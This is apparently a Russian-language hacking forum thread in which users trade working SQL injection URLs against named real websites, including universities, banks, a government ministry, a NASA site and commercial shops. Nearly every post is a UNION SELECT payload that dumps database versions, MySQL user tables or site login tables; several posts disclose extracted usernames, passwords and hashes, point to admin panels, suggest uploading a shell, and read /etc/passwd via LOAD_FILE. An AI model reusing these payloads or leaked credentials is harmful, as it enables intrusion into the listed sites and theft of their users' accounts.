alvisha:62f31c50cb2d36b5e3a7e06a5d43f48a
798 юзеров

когда нашел админку, подумал... нафиг я все это подбирал)
база юзеров, доступ без авторизации :D
http://www.fortress.ru/admin/users/index.php
остальное: http://www.fortress.ru/admin/

http://www.zagorod.net/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*

http://art.specialradio.ru/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

ну собствено вот....

http://www.pij.org/details.php?id=-820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28/*


http://www.onlinenews.com.pk/details.php?id=-85519+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

http://www.hpcalc.org/details.php?id=-3644+union+select+1,password,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29+from+users/*

http://www.debate21.com/comic.php?id=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+from+mysql.user/*

http://physiology.case.edu/faculty.php?id=-91+union+select+1,password,3,4,5,6,7,8,9+from+mysq l.user/*

http://dma.ucla.edu/people/faculty.php?ID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16/*

http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*

http://bme.rutgers.edu/faculty.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( login,char(58),password),14,15,16,17,18,19,20+from +users/*

http://www.bard.edu/academics/faculty/faculty.php?action=details&id=-217+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22/*

http://las.arts.ubc.ca/las4/faculty.php?facultyid=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.clark.edu/news_events/faculty_experts/faculty.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.de-viz.ru/articles_view.php?articles_id=-1+union+select+1,2,3,concat(user,0x3a,password),5, 6,7,8,9+from+mysql.user/*
root:67457e226a1a15bd
mysql-hash

next:

http://www.masterkit.ru/main/set.php?num=-1+union+select+1,2,3,4,5,concat(name,0x3a,pass),7, 8,9,10,11,12,13,14+from+user+limit+0,1/*
122 юзера, пассы чистые

эх)

http://www.dukemednews.duke.edu/gallery/detail.php?id=-1+union+select+concat(user,char(58),password),2+fr om+mysql.user+limit+0,1/*

http://dewerelddraaitdoor.vara.nl/jakhalzen.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

http://avtosalon.in.ua/salon_view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*


Вот еще несколько))) :cool:

mpio

http://www.mpio.com.ru/goods/product.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7

www.tas-combank.com.ua


http://www.tas-combank.com.ua/index.php?cat=8&news=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.rozenbaum.ru/faq/index.php?type=2&id=4&id2=-1+union+select+1,2,3,4,5,6,concat(user,char(58),pa ssword),8,9,10,11+from+mysql.user--

http://www.rozenbaum.ru/admin
заливай шелл...^^

http://www.survival-international.org/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18/*

http://bridge-belarus.org/php/person_tours.php?id=-1+union+select+1,2,version(),user(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22/*

Вот, наверное последние на сегодня. :) ;) :cool:

Колкру, доделываю твою работу =)


www.mercedes-benz.ru

...в процессе...
http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

еще одна, пока не ковырял, парюсь с колонками первой
http://www.mercedes-benz.ru/faq/?type=5-1



slavutichbank.kiev.ua

http://slavutichbank.kiev.ua/main.php?mid=9999+union+select+1,2/*

http://www.okeo.ru/xo4u.php?id=-81202+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(con cat(nick,char(58),email,char(58),passw),0x71),0x71 ),4,5,6,7,8,9,10+FROM+chausers+limit+1,1/* всего юзеров 3223 ни пассов ни мыла нету :( одним словом лажа.

http://www.fotoline.ru/divisions.php?id=-1+union+select+1,2,version(),4/*

____
1000-oe сообщение в этой теме)) :D :D :cool:

sportshopik.ru
http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user,0x3a,password)+from+m ysql.user+limit+1,1/*
vavaha:5fb4ffc22deb3e8c
mysql4hash.
5fb4ffc22deb3e8c=vova

upd: млин, забыл
админка _http://www.sportshopik.ru/forum/admin.php

ps: #1001 :)

[QUOTE=Colkru]http://www.fotoline.ru/divisions.php?id=-1+union+select+1,2,version(),4/*

А вот и нет,
http://www.fotoline.ru/divisions.php?id=-1+union+select+1,version(),3,4,5,6,7/*

http://www.ribm.mmu.ac.uk/news.php?id=-287%20union%20select%201,2,3,4,5,6,7,8/*

http://www.promotionalmarketingexhibition.co.uk/news.php?id=-21%20union%20select%201,2,3,4/*

___

http://onlinesexshop.ru/view/?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13/*

http://www.alvatex.ru/catalog.html?cid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

http://www.ttfinance.ru/release.php?id=-1+union+select+1
http://www.happyland-drink.ru/brands.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25
=\

www.petrocommerce.com.ua

колонки правда не все, упарился уже =(
http://www.petrocommerce.com.ua/view.php?id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*

http://marykay.freshop.ru/good.php?id=-8+union+select+1,2,3,4,5,6,7,8/*
какой то тупой магаз =\
http://www.saletv.ru/listcatalog.php?id=-2+union+select+1,2/*
и это тоже

2Spyder
http://marykay.freshop.ru/good.php?id=-8+union+select+1,concat(username,char(58),password ),3,4,5,6,7,8+from+prgp_user/* ;)

http://www.landlords.ru/detail.php?id=-1+union+select+1,2,concat(username,char(58),passwo rd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38+from+admin/*
Логин и пароль админа в чистом виде.

Админка: http://www.landlords.ru/admin .
:cool:
___________
http://www.extenzilla.org/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,table_name,20,21,22,23,24+from+INFORMATI ON_SCHEMA.TABLES+limit+0,1/*
___________
http://www.consumententv.nl/terugkijken.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,version()/*

Два секс-шопа ;)

http://ixi.kiev.ua/catalog.php?r='+union+select+1,2,3,table_name+from +information_schema.tables+limit+17,1/*

http://www.sexshop-online.ru/index.php?part=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13/*

http://www.redbullairrace.com/pilots.php?id=-16+union+select+1,2,3,4,convert(version()+using+la tin1),6,7,8,9,10,11,12,13,14,15,16

Amobile.ru

http://www.amobile.ru/logo/color/loadpic.php?id=-1+union+select+user(),version(),3,4,5,6,7,8/*

Таблицы не подобрал.

Ну чтож, поехали =)

http://www.boyersteel.com/products.php?id=-1+union+select+version(),2,3,4/*


Можно чекнутся =( и это еще не все =( сколько ж их там :eek:
http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121/*

ок, го
http://www.gnn.tv/users/user.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,version(),24,25,26,27,28,29 ,30,31

http://www.virtusroma.it/comunicati.php?id=-1+union+select+1,2,version(),4,5,6/*

http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+Select+version(),2,3,4,5,6,7,8/*

http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+Select+version(),2,3,4,5,6,7,8/*
Уже было, в этом же скрипте.

_____

http://dewerelddraaitdoor.vara.nl/nieuws_laatste.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19/*

и-в жопу.
http://www.clasp.org/publications.php?id=-16+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15/*

и-в жопу.
http://www.clasp.org/publications.php?id=-16+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15/*
Тоже было и тоже в этом скрипте... :D
+++
Скуля:
http://director-online.com/buildArticle.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+user/*

и-в жопу.
http://www.clasp.org/publications.php?id=-16+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15/*

Моё кунг-фу сильнее твоего

http://www.clasp.org/publications.php?id=-16+union+select+1,2,password,4,5,6,7,8,9,10,11,12, 13,14,15+from+user/*

Моё кунг-фу сильнее твоего

http://www.clasp.org/publications.php?id=-16+union+select+1,2,password,4,5,6,7,8,9,10,11,12, 13,14,15+from+user/*

А еще лучше так:

http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(username,char(58),passwo rd),4,5,6,6,8,9,10,11,12,13,14,15+from+user/*

И админка:

http://www.clasp.org/admin/login.php

http://www.mooreindhardware.com/products.php?id=-2+union+select+1,2,version()

http://www.mooreindhardware.com/products.php?id=-2+union+select+1,2,version()
И сново повтор :o :o :( .
===
Скуля:

http://www.chicagomediaaction.org/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

Ну чтож, поехали =)
Можно чекнутся =( и это еще не все =( сколько ж их там :eek:
http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121/*что то мне подсказывает что там нет скули :D :D

http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(username,char(58),passwo rd),4,5,6,6,8,9,10,11,12,13,14,15+from+user/*


Точно, замучался подбирая так и не нашел =(

что то мне подсказывает что там нет скули

100%, проверял и не один раз, и вот еще одна там же

http://www.mercedes-benz.ru/faq/?type=sql-inj

http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,5,6

colkru идёт на***!!!

http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,5,6

colkru идёт на***!!!

И почему сруз на*** (кстати эта скуля тоже была) :D
Смотри тут (http://slil.ru/24072192) я начал собирать лист всех скулей выложеных в этой теме(для себя), пока там до 53 стр., 86,87. Так что можеш юзать нажатием клавиши
ctrl+F. Потом дам лист (если хочеш) со всеми скулями(чтобы не было повторов).
.
p.s. сорри за офтоп.
Скуля:

http://texte.ruprecht.de/zeigartikel.php?id=-1+union+select+1,convert(version()+using+latin1),3 ,4,5,6,7,8,9,10,11/*

http://www.dvdfuture.com/features.php?id=-7+union+select+version(),2,3,4,5,6,7/*

PS
если colkru 3.14здить всякий бред - то я его встречу когда он пойдёт на гитару. :mad:

http://www.dvdfuture.com/features.php?id=-7+union+select+version(),2,3,4,5,6,7/*

Лучше так:

http://www.dvdfuture.com/features.php?id=-7+union+select+1,2,concat(username,char(58),user_p assword),4,5,6,7+from+phpbb_users+limit+1,1/*

www.avtozazbank.com

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

http://www.mishijos.cl/servicios/sabiasque.php?id=-11+union+select+1,concat(user_password,char(58),us ername)+from+users/*

http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user) ,6,7,8+from+mysql.user/*

http://www.jongerenclub.nl/news.php?action=comments&id=-65+union+select+1,2,concat(username,0x3a,email,0x3 a,pass,0x3a,id),4,5,6+from+users/*

http://www.windsurf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,ve rsion()/*

:)

www.avtozazbank.com

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*

http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,concat(user_name,char (58),user_pass),9+from+users/*

http://www.windsurf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,ve rsion()/*

:)
да там ведь и форум бажный.. UBB хех)
http://www.windsurf.ru/board/showflat.php?Board=club&Number=-1+union+select+1,2,3,concat(id,0x3a,login,0x3a,ema il),5,6,7+from+members+limit+0,1/*
столбик с паролем не подобрал :) тока login && email :cool:

http://www.jigsawpuzzleplayer.com/pack.php?id=-7+union+select+1,2,version(),4,5,6,7

http://www.bozar.be/activity.php?id=-1+union+select+1,2,concat(name,char(58),password), 4,5,6,7,8,9,10,11,concat(name,char(58),password),1 3,14,15,16+from+users+limit+0,1/*

Пасс админа зашифрован(((

http://video.antichat.ru/search/action=search&type=search&search=Zfailure&logic=AND&where=nick&group=no&order=id&vozr='DESC&str=0&b=&hotlog=&str=1

Собственно интересный комент)))

http://dewerelddraaitdoor.vara.nl/nieuws_media.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19/*

Можно чекнутся =( и это еще не все =( сколько ж их там :eek:
http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103,104,105,106,107,108,109,110, 111,112,113,114,115,116,117,118,119,120,121/*
Всего 5 :)
http://www.mercedes-benz.ru/company/news/?id=-342%20union%20select%201,2,3,4,5/*

http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-186%20UNION%20SELECT%201,2,3,4,5,6,7,AES_DECRYPT(A ES_ENCRYPT(password,0x71),0x71),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+f rom+mysql.user/*


может уже и было

http://www.devicecom.ru/anonce/index.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7 ,8,9,10,11+from+users+limit+0,1/*&np=1&bl=np
пассы в чистом виде
dev:L3GWo1ZYj3
iuser:JXnYE0Upk7
SergeyDC:06062006
админка http://www.devicecom.ru/admin

Перехожу на gov* =)

www.rosprom.gov.ru

http://www.rosprom.gov.ru/snews.php?id=-1+union+select+1,2,3,4,5,6/*

http://www.punkbands.com/reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version (),31,32,33,34,35,36,37/*


Что-то я сегодня слабо...Наверное потомучто после длительного периода в школу пошел... :mad: :(

http://www.artsalivesb.com/pages.php?id=-4+union+select+1,2,convert(version()+using+latin1) ,4

to \6/
Помоему пасс в чистом виде??)
http://www.artsalivesb.com/pages.php?id=-4+union+select+1,2,convert(password+using+latin1), 4+from+users/*

_http://www.piratesinfo.com/biography/biography.php?article_id=-1+union+select+1,2,concat(username,0x3a,password,0 x3a,email,0x3a,0x3a),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+from+phorum_users/*

http://www.magicmarkerrecords.com/bandPage.php?id=-6+union+select+1,2,3,4,5,version()

climate.gsfc.nasa.gov

hekk!
http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fnam e,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/*

http://www.dengi-info.com/news/?nid=-1+union+select+concat(database(),char(58),user()), 2,3,4,5,6/*

Что то так и не докопался до таблиц к админке.

http://www.infodirekt.se/item.php?id=-1+union+select+1,2,3,4,table_name,5,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

http://www.climbzone.ru/galer.php?id=-1+union+select+1,concat(username,char(58),user_pas sword),3+from+phpbb_users/*

___
http://www.wiihaveaproblem.com/show_article.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+INF ORMATION_SCHEMA.TABLES/*

Во таблицы масивом выводится, почаще бы так))))

http://www.kevinsdjschool.com/gallery/addcomment.php?pid=-89+union+select+1,2,3,concat(user,0x3a,pass,0x3a,i d),5,6+from+users/*

Пассы в чистом виде

http://www.bhmdiocese.org/viewapostolate.php?id=-4+union+select+1,2,version(),4

с этими ничего не сделал:

__http://www.sscnet.ucla.edu/issr/csup/pubs/papers/item.php?id=31+group+by+17/*
__http://www.merrimack.edu/generator.php?id=1222'
__http://www.ee.virginia.edu/profile.php?ID=8+order+by+22/*


а в этой не добрался до таблиц, и фильтрация на кавыки
__http://www.eng.wayne.edu/page.php?id=5+union+select+1,convert(version()+usi ng+latin1),3,4,5,6/*
__http://www.eng.wayne.edu/page.php?id=5+union+select+1,LOAD_FILE(char(47,101 ,116,99,47,112,97,115,115,119,100)),3,4,5,6/*

http://www.trinityfoundation.org/new_article.php?id=-8+union+select+1,2,3,version(),5,6,7,8/*

http://www.survival-international.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
нужен мозг) не могу подобрать tablename

http://www.gamingreport.com/article.php?sid=-11+union+select+1,2,3,version(),5,6,7,8,9,10,11